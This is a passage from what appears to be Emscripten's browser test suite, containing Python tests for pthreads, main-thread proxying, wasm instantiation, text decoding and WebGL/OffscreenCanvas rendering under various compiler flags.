self.btest(test_file('pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_spawns(self):
self.btest(test_file('pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '--closure=1', '-s', 'ENVIRONMENT=web,worker'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(test_file('pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest(test_file('pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ASSERTIONS'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest(test_file('pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest(test_file('pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'LIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest(test_file('pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
def test_pthread_unistd_io_bigint(self):
self.btest_exit(test_file('unistd', 'io.c'), args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'WASM_BIGINT'])
# Test that the main thread is able to use pthread_set/getspecific.
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest(test_file('pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS'], also_asmjs=True)
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest(test_file('pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(test_file('pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args)
@requires_threads
def test_pthread_dispatch_after_exit(self):
self.btest_exit(test_file('pthread', 'test_pthread_dispatch_after_exit.c'), args=['-s', 'USE_PTHREADS'])
# Test the operation of Module.pthreadMainPrefixURL variable
@no_wasm_backend('uses js')
@requires_threads
def test_pthread_custom_pthread_main_url(self):
ensure_dir('cdn')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
''')
# Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test.html'])
shutil.move('test.worker.js', os.path.join('cdn', 'test.worker.js'))
shutil.copyfile('test.html.mem', os.path.join('cdn', 'test.html.mem'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test2.html'])
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?1')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), that it's not a deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest(test_file('pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(test_file('pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'INITIAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS']]:
self.btest(test_file('gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest(test_file('pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest(test_file('pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async(self):
self.btest(test_file('pthread', 'call_async.c'), expected='1', args=['-s', 'USE_PTHREADS'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest(test_file('pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread', 'call_sync_on_main_thread.js')])
self.btest(test_file('pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_sync_on_main_thread.js')])
self.btest(test_file('pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_sync_on_main_thread.js'), '-s', 'EXPORTED_FUNCTIONS=_main,_malloc'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(test_file('pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread', 'call_async_on_main_thread.js')])
self.btest(test_file('pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_async_on_main_thread.js')])
self.btest(test_file('pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
for args in [['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')], ['-O3']]:
self.btest(test_file('pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
args = ['-s', 'WASM_ASYNC_COMPILATION=0']
self.btest(test_file('pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest(test_file('pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest(test_file('pthread', 'test_pthread_utf8_funcs.cpp'), expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test the emscripten_futex_wake(addr, INT_MAX); functionality to wake all waiters
@requires_threads
def test_pthread_wake_all(self):
self.btest(test_file('pthread', 'test_futex_wake_all.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'INITIAL_MEMORY=64MB', '-s', 'NO_EXIT_RUNTIME'], also_asmjs=True)
# Test that stack base and max correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest(test_file('pthread', 'test_pthread_stack_bounds.cpp'), expected='1', args=['-s', 'USE_PTHREADS'])
# Test that real `thread_local` works.
@requires_threads
def test_pthread_tls(self):
self.btest(test_file('pthread', 'test_pthread_tls.cpp'), expected='1337', args=['-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@requires_threads
def test_pthread_tls_main(self):
self.btest(test_file('pthread', 'test_pthread_tls_main.cpp'), expected='1337', args=['-s', 'USE_PTHREADS'])
@requires_threads
def test_pthread_safe_stack(self):
# Note that as the test runs with PROXY_TO_PTHREAD, we set TOTAL_STACK,
# and not DEFAULT_PTHREAD_STACK_SIZE, as the pthread for main() gets the
# same stack size as the main thread normally would.
self.btest(test_file('core', 'test_safe_stack.c'), expected='abort:stack overflow', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'STACK_OVERFLOW_CHECK=2', '-s', 'TOTAL_STACK=64KB'])
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-gsource-map']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_lsan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-gsource-map']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@requires_threads
def test_pthread_asan_use_after_free(self):
self.btest(test_file('pthread', 'test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread', 'test_pthread_asan_use_after_free.js')])
@requires_threads
def test_pthread_exit_process(self):
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-s', 'EXIT_RUNTIME',
'-DEXIT_RUNTIME',
'-O0']
args += ['--pre-js', test_file('core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(test_file('core', 'pthread', 'test_pthread_exit_runtime.c'), expected='onExit status: 42', args=args)
@requires_threads
def test_pthread_no_exit_process(self):
# Same as above but without EXIT_RUNTIME. In this case we don't expect onExit to
# ever be called.
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-O0']
args += ['--pre-js', test_file('core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(test_file('core', 'pthread', 'test_pthread_exit_runtime.c'), expected='43', args=args)
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
def test_main_thread_em_asm_signatures(self):
self.btest_exit(test_file('core', 'test_em_asm_signatures.cpp'), assert_returncode=121, args=[])
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest_exit(test_file('core', 'test_em_asm_signatures.cpp'), assert_returncode=121, args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_async_em_asm(self):
self.btest_exit(test_file('core', 'test_main_thread_async_em_asm.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_em_asm_blocking(self):
create_file('page.html', open(test_file('browser', 'test_em_asm_blocking.html')).read())
self.compile_btest([test_file('browser', 'test_em_asm_blocking.cpp'), '-O2', '-o', 'wasm.js', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
self.run_browser('page.html', '', '/report_result?8')
# Test that it is possible to send a signal via calling alarm(timeout), which in turn calls to the signal handler set by signal(SIGALRM, func);
def test_sigalrm(self):
self.btest(test_file('sigalrm.cpp'), expected='0', args=['-O3'])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', test_file('canvas_style_proxy_shell.html'), '--pre-js', test_file('canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(test_file('canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(test_file('custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', test_file('custom_messages_proxy_shell.html'), '--post-js', test_file('custom_messages_proxy_postjs.js')])
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
self.compile_btest([test_file('in_flight_memfile_request.c'), '-o', 'test.js'] + opts)
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, returncode in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'WASM_ASYNC_COMPILATION'], 1), # force it on
(['-O1', '-s', 'WASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, returncode)
self.btest_exit('binaryen_async.c', assert_returncode=returncode, args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest_exit('binaryen_async.c', assert_returncode=1, args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
@parameterized({
'': ([],),
'asan': (['-fsanitize=address', '-s', 'INITIAL_MEMORY=128MB'],)
})
def test_manual_wasm_instantiate(self, args=[]):
self.compile_btest([test_file('manual_wasm_instantiate.cpp'), '-o', 'manual_wasm_instantiate.js'] + args)
shutil.copyfile(test_file('manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
ensure_dir('cdn')
create_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
self.compile_btest([test_file('browser_test_hello_world.c'), '--shell-file', 'shell2.html', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest_exit('benchmark_utf8.cpp', 0, args=['--embed-file', test_file('utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXPORTED_RUNTIME_METHODS=[UTF8ToString]'])
def test_utf16_textdecoder(self):
self.btest_exit('benchmark_utf16.cpp', 0, args=['--embed-file', test_file('utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXPORTED_RUNTIME_METHODS=[UTF16ToString,stringToUTF16,lengthBytesUTF16]'])
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
self.assertLess(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure=1', '-s', 'INCOMING_MODULE_JS_API=[]', '-s', 'ENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 5453), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has once been used to render WebGL content in a pthread first
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
@disabled('This test is disabled because current OffscreenCanvas does not allow transfering it after a rendering context has been created for it.')
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest('gl_only_in_pthread.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests for WEBGL_multi_draw extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
@requires_graphics_hardware
def test_webgl_multi_draw(self):
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
# Tests for base_vertex/base_instance extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
# If testing on Mac, you also need --use-cmd-decoder=passthrough to get this extension.
# Also there is a known bug with Mac Intel baseInstance which can fail producing the expected image result.
@requires_graphics_hardware
def test_webgl_draw_base_vertex_base_instance(self):
for multiDraw in [0, 1]:
for drawElements in [0, 1]:
self.btest('webgl_draw_base_vertex_base_instance_test.c', reference='webgl_draw_instanced_base_vertex_base_instance.png',
args=['-lGL',
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'OFFSCREEN_FRAMEBUFFER',
'-DMULTI_DRAW=' + str(multiDraw),
'-DDRAW_ELEMENTS=' + str(drawElements),
'-DEXPLICIT_SWAP=1',
'-DWEBGL_CONTEXT_VERSION=2'])
@requires_graphics_hardware
def test_webgl_sample_query(self):
cmd = ['-s', 'MAX_WEBGL_VERSION=2', '-lGL']
self.btest('webgl_sample_query.cpp', expected='0', args=cmd)
@requires_graphics_hardware
def test_webgl_timer_query(self):
for args in [
# EXT query entrypoints on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION'],
# builtin query entrypoints on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2'],
# EXT query entrypoints on a WebGL 1.0 context while built for WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2'],
]:
cmd = args + ['-lGL']
self.btest('webgl_timer_query.cpp', expected='0', args=cmd)
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
# Tests all the different possible versions of libgl
for threads in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
for version in [[], ['-s', 'FULL_ES3'], ['-s', 'FULL_ES3']]:
args = ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1'] + threads + version
print('with args: %s' % str(args))
self.btest('webgl_draw_triangle.c', '0', args=args)
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest('test_webgl_no_auto_init_extensions.c', '0', args=['-lGL', '-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# VAO path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION'],
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1']
self.btest('webgl_offscreen_framebuffer_swap_with_bad_state.c', '0', args=cmd)
# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest('webgl_draw_triangle_with_uniform_color.c', '0', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_proxied_pthread(self):
for asyncify in [0, 1]:
cmd = ['-s', 'USE_PTHREADS', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'GL_DEBUG', '-s', 'PROXY_TO_PTHREAD']
if asyncify:
# given the synchronous render loop here, asyncify is needed to see intermediate frames and
# the gradual color change
cmd += ['-s', 'ASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest('gl_in_proxy_pthread.cpp', expected='1', args=cmd)
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self):
for args1 in [[], ['-s', 'PROXY_TO_PTHREAD']]:
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
cmd = args1 + args2 + args3 + ['-s', 'USE_PTHREADS', '-lGL', '-s', 'GL_DEBUG']
print(str(cmd))
self.btest('resize_offscreencanvas_from_main_thread.cpp', expected='1', args=cmd)
@requires_graphics_hardware
